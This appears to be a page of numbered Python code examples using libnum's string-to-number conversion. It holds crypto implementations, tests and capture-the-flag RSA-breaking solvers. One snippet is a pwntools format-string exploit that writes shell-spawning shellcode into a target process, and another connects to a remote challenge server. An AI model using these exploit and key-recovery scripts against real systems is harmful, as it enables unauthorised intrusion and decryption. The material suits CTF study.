Exemplo n.º 1
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def file_encrypt(filepath):
    """
    对文件进行DES-CBC加密,并用RSA加密key和iv
    :param filepath: 原文件路径
    :return: 加密文件路径, 原文件md5值, 加密后的key, 加密后的iv
    """
    # 随机生成key和iv
    key, iv = get_des_param()
    # 打开原文件
    origin_file = open(filepath, 'rb')
    origin_filedata = origin_file.read().decode('latin')
    # 计算原文件的消息摘要
    origin_digest = md5(origin_filedata)
    # 加密后文件的地址(统一加上.encrypted后缀)
    encrypted_filepath = filepath + ".encrypted"
    # 写入加密文件
    encrypted_file = open(encrypted_filepath, 'wb')
    encrypted_file.write(
        DES.des_cbc_encrypt(origin_filedata, key, iv).encode('latin'))
    # 关闭文件
    origin_file.close()
    encrypted_file.close()
    # 用client的公钥对key和iv进行加密
    key_encrypted = RSA.Encrypt(libnum.s2n(key), server_e, server_n)
    iv_encrypted = RSA.Encrypt(libnum.s2n(iv), server_e, server_n)
    return encrypted_filepath, origin_digest, key_encrypted, iv_encrypted
Exemplo n.º 2
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def test_s2n_n2s():
    s = b"long string to test"
    val = 2418187513319072758194084480823884981773628276
    assert s2n(s) == val
    assert n2s(val) == s
    with pytest.raises(TypeError):
        s2n(100)
    with pytest.raises(TypeError):
        n2s("qwe")
Exemplo n.º 3
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def transfer_encrypt(message):
    """
    对分组传输的每一个分组进行des_cbc加密,且每次使用不同的key和iv
    :param message: 被加密的分组
    :return: key,iv,cipher
    """
    key, iv = get_des_param()
    cipher = DES.des_cbc_encrypt(message, key, iv, 'b')
    # 用server的公钥对key和iv进行加密
    key_encrypted = RSA.Encrypt(libnum.s2n(key), server_e, server_n)
    iv_encrypted = RSA.Encrypt(libnum.s2n(iv), server_e, server_n)
    return key_encrypted, iv_encrypted, cipher
Exemplo n.º 4
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def encipher(plaintext, pk):
    m = libnum.s2n(plaintext)
    print(m)
    n, g = pk
    r = random.randint(1, n ** 2)
    c = gmpy2.powmod(g, m, n ** 2) * gmpy2.powmod(r, n, n ** 2) % (n ** 2)
    return c
Exemplo n.º 5
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def encrypt(info_list):
	flag_backup = libnum.s2n(flag)
	enc_flag_binlist = []
	for i in range(bits_length):
		info = info_list[i]
		flag_temp = flag_backup
		res = 0
		# this is the first step
		while info != 0:
			temp = info & 1
			info = info >> 1
			res = res << 1
			res += flag_temp & temp
			flag_temp = flag_temp >> 1
		# this is the first step
		# this is not end >:<
		enc_flag = 0
		while res != 0:
			enc_flag += res & 1
			res = res >> 1
		# this is not end >:<
		enc_flag = enc_flag & 1
		# what is this
		enc_flag_binlist.append(enc_flag)
	return binlist_number(enc_flag_binlist)
Exemplo n.º 6
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 def short_div(i=65537, b=16):
     if isinstance(i, bytearray): i = i.decode()
     if isinstance(i, str): i = libnum.s2n(i)
     retarr = []
     while i > 0:
         retarr.append(i % b)
         i //= b
     return retarr[::-1]
Exemplo n.º 7
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def add(KEY, number, dec):
    key = libnum.s2n(KEY)
    key = (key + number) & mask
    KEY = libnum.n2s(key).rjust(BLOCK_SIZE, "\x00")
    dec = dec + (BLOCK_SIZE - len(dec) % BLOCK_SIZE) * "\x00"
    assert len(dec) % BLOCK_SIZE == 0
    AES_ECB = AES.new(KEY, AES.MODE_ECB)
    return AES_ECB.encrypt(dec)
Exemplo n.º 8
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def xor(KEY, number, dec):
    key = libnum.s2n(KEY)  #32Bytes to a big num
    key = (key ^ number) & mask  #low 32 B
    KEY = libnum.n2s(key).rjust(BLOCK_SIZE, "\x00")
    dec = dec + (BLOCK_SIZE - len(dec) % BLOCK_SIZE) * "\x00"  #dec\x00...
    assert len(dec) % BLOCK_SIZE == 0
    AES_ECB = AES.new(KEY, AES.MODE_ECB)
    return AES_ECB.encrypt(dec)
Exemplo n.º 9
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def enc(m, pk):
    m = s2n(m)
    e, v = getrandbits(256), getrandbits(256)
    E, V = pow(g, e, p), pow(g, v, p)
    s = v + e * h2(n2s(E) + n2s(V))
    c = m * pow(pk, e + v, p) % p
    cap = (E, V, s)
    return c, cap
Exemplo n.º 10
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def encipher(plaintext, pk):
    if(plaintext.isdigit()):
        m=int(plaintext)
    else:
        m = libnum.s2n(plaintext)
    n, g = pk
    r = random.randint(1, n ** 2)
    c = gmpy2.powmod(g, m, n ** 2) * gmpy2.powmod(r, n, n ** 2) % (n ** 2)
    return c
Exemplo n.º 11
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def append(m):
    p = getPrime(2048)
    q = getPrime(2048)
    n = p * q
    result = ["%s\n" % str(n)]
    pm = padding(flag)

    for i in range(32):
        e = getPrime(32)
        c = pow(s2n(pm), e, n)
        result.append("%s->%s\n" % (str(e), str(c)))
    return "".join(result)
Exemplo n.º 12
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def writeSc():
    shellcode = asm(shellcraft.execve("sh"))
    base = elf.bss()

    i = 0
    while i < len(shellcode):
        #  print s2n(shellcode[i: i + 2])
        payload = "%" + str(s2n(shellcode[i:i + 2])) + "c%8$hhn"
        payload = payload.ljust(16, "|") + p64(base + i)
        #  print payload
        io.sendlineafter("> ", "2")
        io.sendlineafter("m4x\n", payload)
        i += 2
Exemplo n.º 13
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def build_forged_table():
    global forged_table
    enckey = '\x00' * 16
    cipher = AES.new(enckey, AES.MODE_ECB)
    payload = '\x00' + libnum.n2s(1) + '\x00' * 14
    payload = cipher.encrypt(payload)
    forged_table[1] = enckey
    print '[ ] Running forging procedure...'
    while len(forged_table.keys()) < 7:
        enckey = os.urandom(16)
        cipher = AES.new(enckey, AES.MODE_ECB)
        roll = libnum.s2n(cipher.decrypt(payload)[:2])
        if roll < 7 and roll > 1 and roll not in forged_table.keys():
            forged_table[roll] = enckey
Exemplo n.º 14
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def encode(plaintext, pk):
    E = pk[0]
    n = pk[1]
    G = pk[2]
    P_B = pk[3]
    m = libnum.s2n(plaintext)
    k = random.randrange(1, n)
    P1 = ecc_mul(k, G, E, n)
    P2 = ecc_mul(k, P_B, E, n)
    x_y = get_x_y(E)
    Pt = x_y[random.randrange(0, len(x_y) - 1)]
    p = E[2]
    C = (m * Pt[0] + Pt[1]) % p
    ciphertext = [P1, ecc_add(Pt, P2, E), C]
    return ciphertext
Exemplo n.º 15
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def encrypt():
    m = raw_input("请输入明文: ")
    p = genPrime(1024)
    q = genPrime(1024)
    n = p * q
    fi = (p - 1) * (q - 1)
    i = (p - 1) * (q - 1) - 1
    while True:
        if gcd(i, (p - 1) * (q - 1)) == 1:
            e = i
            break
        i -= 1

    c = pow(s2n(m), e, n)
    print "密文: ", c
    return p, q, n, e, c
Exemplo n.º 16
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def decodeBase64(src):
    delPaddingTail = {0: 0, 2: 4, 1: 2}
    value = ''
    n = src.count('=')
    sin = src[:len(src) - n]
    for c in sin:
        value += bin(table.find(c))[2:].zfill(6)
    value = value[:len(value) - delPaddingTail[n]]
    #  print value
    middle = []
    for i in range(8, len(value) + 1, 8):
        middle.append(int(value[i - 8:i], 2))
    output = middle
    out = hex(s2n(''.join(map(chr, output))))[2:-1]
    #  print out
    return out
Exemplo n.º 17
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def encipher(plaintext):
    long_val = libnum.s2n(plaintext)
    ciphertext = ''
    while long_val >= len(b58table):
        div, mod = div_mod(long_val, table_len)
        ciphertext = b58table[mod] + ciphertext
        long_val = div
    ciphertext = b58table[long_val] + ciphertext
    pad = 0
    for c in plaintext:
        if c == '\x00':
            pad += 1
        else:
            break
    ciphertext = b58table[0] * pad + ciphertext
    return ciphertext
def sign(m, d, n):
    """
    对消息m进行签名
    :param m: 消息m
    :param d: 签名用的私钥
    :param n: 签名用的公钥
    :return: 消息m的签名
    """
    d = int(d)
    n = int(n)
    # 先用md5产生消息的摘要
    digest = md5(m)
    # 转为10进制
    digest = libnum.s2n(digest)
    # 对摘要进行签名
    s = pow(digest, d, n)
    return hex(s)[2:]
Exemplo n.º 19
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def b64encrypt(src, msg):
    from libnum import n2s, s2n
    from base64 import b64encode
    lines = 0
    '''
    for i in range(len(src)):
        if src[i] == '\n':
            lines += 1
    length = s2n(msg).bit_length()
    if lines < 2 * length:
        return 'Failed'
    '''
    put = []
    src = src.split('\n')
    container = 0
    for i in range(len(src)):
        src[i] += '\n'
        length = len(src[i])
        container += - (length % 3) % 3 * 2
    bins = bin(s2n(msg))[2:]
    bins = '0' * (- (len(bins) % 8)  % 8) + bins
    print container, len(bins)
    assert container >= len(bins)
    bins += '0' * (container - len(bins))
    index = 0
    for i in range(len(src)):
        cur = b64encode(src[i])
        src[i] = cur
        equal = 0
        if cur[-1] == '=':
            equal += 1
            if cur[-2] == '=':
                equal += 1
        if equal == 0:
            continue
        if index >= container:
            break
        add = int(bins[index: index + 2 * equal], 2)
        index += 2 * equal
        change = cur[- equal - 1]
        assert code.index(change) ^ add == code.index(change) + add
        change = code[code.index(change) ^ add]
        src[i] = src[i][0: - equal - 1] + change + '=' * equal
    return '\n'.join(src)
def check(m, s, e, n):
    """
    对签名进行验证
    :param m: 消息
    :param s: 消息的的签名
    :param e: 公钥e
    :param n: 公钥n
    :return: 是否通过验证
    """
    s = int(s, 16)
    e = int(e)
    n = int(n)
    # 先用md5产生消息的摘要
    digest = md5(m)
    # 转为10进制
    digest = libnum.s2n(digest)
    # 用公钥对进行验证
    temp = pow(s, e, n)
    if digest == temp:
        return True
    else:
        return False
Exemplo n.º 21
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 def __init__(self, args):
     self.args = args
     if self.args.verbose:
         log.setLevel(logging.DEBUG)
     self.n = args.N or None
     self.e = args.e or None
     self.p = args.p or None
     self.q = args.q or None
     self.d = args.d or None
     # high bits of factor
     self.hbop = args.KHBFA or None
     self.pbits = args.pbits or None
     self.sageworks = args.sageworks
     self.data = args.data or None
     # 是否需要解密密文
     if self.args.decrypt:
         with open(self.args.decrypt, 'r') as f:
             self.c = libnum.s2n(f.read().strip())
     elif self.args.decrypt_int:
         self.c = self.args.decrypt_int
     else:
         self.c = None
Exemplo n.º 22
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def main():
    while True:
        mode = input("\n请选择模式:\n[E]加密\t[D]解密\n")
        if mode == 'E' or mode == 'e':
            m = input("请输入明文:\n")
            nbits = input("请输入位数:\n")
            e, n, d = get_keys(nbits)
            print("公钥e为: " + str(e))
            print("公钥n为: " + str(n))
            print("私钥d为: " + str(d))
            print("明文为: " + m)
            m = libnum.s2n(m)
            # print(m)
            c = Encrypt(m, e, n)
            print("密文为(10进制): " + str(c))
        elif mode == 'D' or mode == 'd':
            c = input("请输入密文(10进制):\n")
            d = input("请输入私钥d:\n")
            n = input("请输入公钥n:\n")
            c = Decrypto(int(c), d, n)
            c = libnum.n2s(c)
            print("密文为: " + str(c))
        else:
            continue
Exemplo n.º 23
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#!/usr/bin/python

import base64
import libnum

n1 = 123948613128507245097711825164030080528129311429181946930789480629270692835124562568997437300916285601268900901495788327838386854611883075845387070635813324417496512348003686061832004434518190158084956517800098929984855603216625922341285873495112316366384741709770903928077127611563285935366595098601100940173

n2 = 122890614849300155056519159433849880305439158904289542874766496514523043027349829509818565800562562195671251134947871996792136355514373160369135263766229423623131725044925870918859304353484491601318921285331340604341809979578202817714205469839224620893418109679223753141128229197377934231853172927071087589849

e = 65537

q = libnum.gcd(n1,n2) # calculate gcd to discover a prime factor in common
p = n1 / q
phi = (p-1) * (q - 1)
c = libnum.s2n(base64.b64decode(open('ciphertext.txt','r').read()))
d = libnum.invmod(e,phi)
m = pow(c,d,n1)
print "[+] Flag: " + libnum.n2s(m)
Exemplo n.º 24
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#!/usr/bin/env python
from Crypto.PublicKey import RSA
import RSAwienerHacker
import libnum

c = libnum.s2n(open('ciphertext.bin').read())
publicKey = RSA.importKey(open('key.public').read())
n = publicKey.n
e = publicKey.e
d = RSAwienerHacker.hack_RSA(e,n)
print libnum.n2s(pow(c,d,n))
Exemplo n.º 25
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def rsa_encrypt(m):

    return pow(s2n(m), e, n)
Exemplo n.º 26
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def xor(a, b):
    return s2n(''.join([chr(ord(i) ^ ord(j)) for i, j in zip(a, b)]))
Exemplo n.º 27
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import libnum

p = 33499881069427614105926941260008415630190853527846401734073924527104092366847259

q = 34311544767652906613104559081988349779622789386528780506962212898921316785995851

e = 65537

c = 1041107528071306841173559309021779797565643224122373681605690175807597543772146942110201234780086486779654727917253504583448809504547742912197821315234006639347

n = p * q

phi = (p - 1) * (q - 1)

d = libnum.modular.invmod(e, phi)
s="Trinityctf{RS4_1s_rs4lly_easylkjsadfhlkjsa!}"
print pow(libnum.s2n(s),e,n)
print libnum.n2s(pow(c, d, n)) #easyctf{wh3n_y0u_h4ve_p&q_RSA_iz_ez_7829d89f}
Exemplo n.º 28
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#!/usr/bin/env python
import gmpy2
import libnum

c1 = 112376755434839067242492450580926874835238627566940029196532175644877689078482714802636681537478746972878719135123815462672622666337365766404438579837929587693947036556506459672209528097159093195480318719604062458476883089712408549646871208319887232708573834573129807851612788612229862109446349174773685766921
k = 151397348765463697819328127490368915291237595957138740365628078489836085372845681091989345334904026246892900348971981402476845038743843701086311667536372419728644485998870855126715225674611022660290971207449534822797616008980284083777280866124762176520095351401654370256535990768524594118090702757650148363921
c2 = 120085813769601903784459580746767828105716607333492124010803514777437504109331448009890874939858984666641139819379969714070220763093188551966830630639308142299719976258227450642141963425187429636880593480951498406380068747404115889400485463839002674872020074254287490910994729347868122864760194135575038263365
q = 133694097868622092961596455982173439482901807533684907590429464542321832157724052684517499871073826858762297729480414306161113412741865099163152505447334863097434932940729269605986418443532208942119505043634990271717198694190123478547503837269948205839761848366722796091382894026537012764323367229104988051357
c3 = 53913320010474614353771348695262553935361078517742942745359182152882204780769206005474818637010209561420480280523029509375286538886061621596249179407728697515399046471231513536340506648832858695583318765423245104561512700887050932667507358898646356134386213016528778706360147066411877832628237361011621917972

key = libnum.s2n('CoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCoCo')
t = c2 * gmpy2.invert(key, q) % q
m = c3 * gmpy2.invert(t, q) % q
flag = libnum.n2s(m)
print flag

Exemplo n.º 29
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import base64
from pwn import *
from libnum import s2n

# context.log_level = "debug"
p = remote("118.31.18.75", 20013)
iv = p.readline()
p.recvuntil("work:")
iv = base64.b64decode(iv)
for x in xrange(100000000000):
    if hashlib.md5(iv + str(x)).hexdigest().startswith("0000"):
        p.sendline(base64.b64encode(str(x)))
        break

t = s2n("flag")
e = 0x10001
p.recvuntil("n: ")
n = p.readline().strip()
n = int(n[2:-1], 16)
print "n: " + hex(n)

print p.recvuntil("x: ")

# x = n
# while True:
# 	if hex(x)[2:10] == '666c6167':
# 		print x
# 		break
# 	x += n
y = pow(t, e, n)
Exemplo n.º 30
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#!/usr/bin/python
# coding=utf-8
import gmpy2
import libnum
from Crypto.PublicKey import RSA

# 读取公钥参数
with open('pubkey.pem', 'r') as f:
    key = RSA.importKey(f)
    N = key.n
    e = key.e
print N

with open('flag.enc', 'r') as f:
    cipher = f.read()
    cipher = libnum.s2n(cipher)
print cipher

print "please input p"
p = int(raw_input(), 10)
print 'please input q'
q = int(raw_input(), 10)
# 计算yp和yq
inv_p = gmpy2.invert(p, q)
inv_q = gmpy2.invert(q, p)

# 计算mp和mq
mp = pow(cipher, (p + 1) / 4, p)
mq = pow(cipher, (q + 1) / 4, q)

# 计算a,b,c,d
Exemplo n.º 31
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################### LAYER 1 ######################
print "[*] Solving layer 1: Weak key factored with ECM method"
# layer 1 public key
n = 94738740796943840961823530695778701408987757287583492665919730017973847138345511139064596113422435977583856843887008168202003855906708039013487349390571801141407245039011598810542232029634564848797998534872251549660454277336502838185642937637576121533945369150901808833844341421315429263207612372324026271327
e = 65537

# layer 1 factored with ECC method
p = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987245583
q = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987246769 

# valid p and q right!?
assert(n % p == 0)
assert(n % q == 0)

c = libnum.s2n(open('almost_almost_almost_almost_there.encrypted','rb').read())
phi = (p - 1) * (q - 1)
d = libnum.invmod(e, phi)
m = pow(c,d,n)
zippassword = libnum.n2s(m)

################### LAYER 2 ######################
print "[*] Solving layer 2: Common factors!"
# unzip layer2
unzip = subprocess.check_output(['unzip','-o','-P',zippassword,'almost_almost_almost_almost_there.zip'])

# get next modulus
l2n = int(subprocess.check_output(['openssl', 'rsa', '-noout', '-modulus', '-pubin', '-in', 'almost_almost_almost_there.pub']).split('=')[1],16)

# load ciphertext
l2c = libnum.s2n(open('almost_almost_almost_there.encrypted','rb').read())
Exemplo n.º 32
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import hmac
from libnum import n2s,s2n
import hashlib
from Crypto.Cipher import DES
dhp=s2n('\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xC9\x0F\xDA\xA2\x21\x68\xC2\x34\xC4\xC6\x62\x8B\x80\xDC\x1C\xD1\x29\x02\x4E\x08\x8A\x67\xCC\x74\x02\x0B\xBE\xA6\x3B\x13\x9B\x22\x51\x4A\x08\x79\x8E\x34\x04\xDD\xEF\x95\x19\xB3\xCD\x3A\x43\x1B\x30\x2B\x0A\x6D\xF2\x5F\x14\x37\x4F\xE1\x35\x6D\x6D\x51\xC2\x45\xE4\x85\xB5\x76\x62\x5E\x7E\xC6\xF4\x4C\x42\xE9\xA6\x37\xED\x6B\x0B\xFF\x5C\xB6\xF4\x06\xB7\xED\xEE\x38\x6B\xFB\x5A\x89\x9F\xA5\xAE\x9F\x24\x11\x7C\x4B\x1F\xE6\x49\x28\x66\x51\xEC\xE6\x53\x81\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF')
dhg=2
dhpi=s2n('\xDB\x58\x40\xCD\x93\x72\x8B\x76\xD1\x71\xE0\xD7\x63\xBC\x78\x94\xF9\xAC\xA4\x1E\xD0\x2C\x07\xFB\x2B\x10\xEC\x6F\xF9\x43\x43\xBC\x65\x81\x36\x62\x79\x0A\x1B\x51\x88\x13\xD4\x97\x42\x35\x73\xFF\xC7\x70\xDA\xC8\xEF\x18\x34\x4D\x99\x53\x2E\x0A\x5D\x1E\xF4\x43\x04\x9C\xB0\x6B\xA8\x69\x9D\x49\x04\xF4\xD4\x70\xD1\xB9\x2E\x2B\x0D\x86\x21\x2D\x89\xFF\x8E\xDE\x90\x01\xD5\x69\x7F\x6C\xB4\x2E\x71\x5D\x0C\x49\x07\xBE\x6B\x62\x28\x0B\xEE\x8F\xDD\xAE\x60\x48\xCE\x47\x9A\xED\x9B\x0F\xF0\x3B\xAA\x54\x93\x5D\xC1\x28\xF7\x5D')
dhpr=s2n('\x7C\xFA\x40\x2B\x3F\xD6\x7B\xF1\xF4\xDE\x20\x4A\x6B\x8A\xF8\x44\x14\x4F\x1F\x8C\x27\x5F\x5A\x93\xD8\xA6\xCA\xDF\xB2\x95\xA4\xE8\x20\xE2\x5C\x3D\x18\x48\x76\xAF\xC5\x31\x04\x67\x4C\x73\xC3\xFF\x26\xA2\x9C\x09\xC9\xB5\x5F\xB4\xD8\x98\x49\xA2\x37\x62\xE3\x2A\xA0\xCF\x83\x88\x4A\x1C\x06\x97\x5A\x35\x5B\xF6\xAA\x98\x79\x0D\xEB\xC2\xBF\xFB\x83\x41\x15\x02\x79\xEB\xC1\x2C\xBF\xB9\xF6\x77\xB0\xE5\xFF\x34\x97\x82\x51\xCB\xF7\x8E\x45\x14\xCE\xB5\x3F\xAF\xB0\x14\x85\x43\x50\x8A\xB6\x45\x95\x15\x2A\xA3\x2A\xA0\xAD\x3A')
rnda=217227749115035578303115991742495457394555440946835514581165277149237157052227668403784536767326288414650333354135580192264021152700162919686294299135414279647180805138410303
rndb=162938785206550875564738389732121139210582420609551964823025935645144235158388990738283910163537245485378422827807450374238085561899166174523954514183122557647647478238328309
dh=pow(dhpi,rndb,dhp)
dh1=pow(dhpr,rnda,dhp)
assert dh==dh1
dh=n2s(dh)
Ni_b='\x97\x00\x3e\x96\xbc\x24\xfc\xf4\x33\x01\xd1\xc4\x3c\x8f\x39\xdb'
Nr_b='\x91\xf6\x7d\x69\x87\xaf\x88\x55\xe0\x0f\x7d\xc7\x7c\x1f\x7a\x54'
key='L2Lkey'
c='\x73\x3D\x05\xC9\x29\xE8\x90\x87\x18\x64\x2E\xEE\xBE\x68\xA3\xC7\x10\xC1\x2C\x09\xB2\x2A\x5C\xFB\x14\xED\xD9\x05\x71\xC3\xDB\x7B\x1B\x59\x8E\xF4\x78\xA2\x34\x4E\x44\x92\x50\x79\x20\xF9\x07\x02'
CKYI='\x9a\x4f\x20\xcd\xb1\x31\x48\xb8'
CKYR='\x31\x32\x33\x36\x35\x34\x33\x32'
#dh=137247906241040090919876955385584427953146893027590677633961074744220353577993931739850208608460762088573995334151351475802221588909889893766807776125874588605505199531437797262808324394122286799024347058396174077697126829526904781090123860153287092978076421343799399389218986715724110092376523175888317759494
skeyid = hmac.new(key, Ni_b+Nr_b).digest()
skeyid_d = hmac.new(skeyid, dh+CKYI + CKYR + '\x00').digest()
skeyid_a = hmac.new(skeyid, skeyid_d + dh + CKYI + CKYR + '\x01').digest()
skeyid_e = hmac.new(skeyid, skeyid_a + dh + CKYI + CKYR + '\x02').digest()
deskey=skeyid_e[:8]
iv=hashlib.md5(n2s(dhpi)+n2s(dhpr)).digest()[:8]
cipher = DES.new(deskey, DES.MODE_CBC, iv)
print cipher.decrypt(c)

Exemplo n.º 33
0
import libnum
from secret import flag

n = 31648734237121093449062759741858353305299887460770378610317325262532812380992998717086045560716165196764876375024736812043316931187449612112014480335819632714635828887393277480117469682571740475521815029501119616029222685021833456834860463301835674320610441456152948762730967186631332998314439886858424113209771045636380932420113750370162135069772576775040641310241869572513488894613647466722538462125698729611696700513321039673589745449355070643639740553615493170049122321689282686291783694560650322957955382056776701778000873105279611461240600373669009171156764610102006874690207503067227784467578546117377910059849
e = 65537
m = libnum.s2n(flag)
c = pow(m, e, n)

print(c)

# 8472470163184012462000528080165090036188635885351596354139960232632956476301235845514827002690956926418292313944863809902769808978125514574094431792449203362125295767224649917756465720590402146607448107700602949310739551154185709505943529176162811567787744455172636958664487513824170824375184591735235862997624339895241609184318108298806242891811364998857087830133524421290948873392796863425163637415895626597006868886489528223728832282320568060824925378471122592356209291540463778941231812179060437264730095781564995912183149503687379604059903141658253650016548620225566653730700129092787790523080898273898653528474
Exemplo n.º 34
0
 def test_s2n(self):
     s = "long string to test"
     val = 2418187513319072758194084480823884981773628276
     self.assertEqual(libnum.s2n(s), val)
     self.assertRaises(TypeError, libnum.s2n, 100)